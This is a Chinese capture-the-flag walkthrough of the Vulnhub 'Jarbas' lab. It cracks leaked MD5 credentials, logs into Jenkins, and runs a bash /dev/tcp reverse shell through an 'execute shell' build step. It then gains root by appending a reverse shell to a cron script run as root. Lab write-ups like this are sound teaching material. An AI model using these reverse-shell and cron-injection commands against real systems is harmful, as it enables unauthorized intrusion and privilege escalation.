【Vulnhub靶机】Jarbas--Jenkins

文章目录

文档说明:https://www.vulnhub.com/entry/jarbas-1,232/

靶机下载:Download (Mirror):

信息收集

主机发现

扫描C段

sudo nmap -sn 10.9.75.0/24

端口扫描

sudo nmap --min-rate 10000 10.9.75.10

详细扫描服务版本,系统

bath 复制代码
sudo nmap -sT -sV -O -p 22,80,3306,8080 10.9.75.10 

目录爆破

bash 复制代码
dirsearch -u http://10.9.75.10 -i 200  

漏洞探测

whatweb

访问80端口

bash 复制代码
whatweb http://10.9.75.10

并没有识别到类似的CMS内容管理系统,

继续访问access.html发现了类似用户名:加密后的密码的东西

hash-identifier

可以使用工具来验证加密类型

bash 复制代码
hash-identifier "5978a63b4654c73c60fa24f836386d87"  

拿去在线网站进行md5解密

tiago:italia99

trindade:marianna

eder:vipsu

访问8080端口

whatweb

bash 复制代码
whatweb http://10.9.75.10:8080

指纹识别出一个Jenkins的CMS管理系统

尝试使用上面解密出来的密码进行登陆

使用eder:vipsu登陆成功!

新建一个任务

选择第一个自由风格软件项目就可以,然后往下翻,点击确定

点击Build构建

由于目标系统是linux系统,所以选择第二个execute shell

bash 复制代码
/bin/bash >& /dev/tcp/10.9.75.3/6868 0>&1

#反弹到kali上

点击应用,然后点击保存

这个时候kali先监听6868端口

bash 复制代码
nc  -lvvp 6868  

回到页面上点击立即构建

就反弹到kali机器上了

页面上会显示有一个任务正在运行

我们拿到shell是没有回显的,可以通过python获取显示shell

python 复制代码
python -c "import pty;pty.spawn('/bin/bash')"

最后再计划任务里找到了以root运行 的程序

查看文件内容

bash 复制代码
cat /etc/script/CleaningScript.sh

可以在里面添加反弹shell,

bash 复制代码
echo "/bin/bash >& /dev/tcp/10.9.75.3/6869 0>&1" >> /etc/script/CleaningScript.sh

kali监听6869端口,等待反弹

Jenkins 的漏洞利用方式有很多,可以自行去网上查阅相关资料

相关推荐
萨格拉斯救世主1 小时前
jenkins使用slave节点进行node打包报错问题处理
运维·jenkins
Narutolxy1 天前
精准优化Elasticsearch:磁盘空间管理与性能提升技巧20241106
大数据·elasticsearch·jenkins
晨欣2 天前
Elasticsearch里的索引index是什么概念?(ChatGPT回答)
大数据·elasticsearch·jenkins
铭毅天下3 天前
基于 Canal + Elasticsearch 的业务操作日志解决方案
大数据·elasticsearch·搜索引擎·全文检索·jenkins
饮啦冰美式3 天前
Jenkins找不到maven构建项目
运维·jenkins·maven
TracyCoder1233 天前
掌握ElasticSearch(八):聚集、文档间的关系
大数据·elasticsearch·jenkins
不惑_3 天前
ES文档:文档操作_doc(7.9.2)
大数据·elasticsearch·jenkins
MetaverseMan4 天前
kubesphere jenkins自动重定向 http://ks-apiserver:30880/oauth/authorize
运维·http·jenkins
weixin_438197384 天前
配置elk插件安全访问elk前台页面
运维·elk·jenkins
不惑_4 天前
ES索引:索引管理
大数据·elasticsearch·jenkins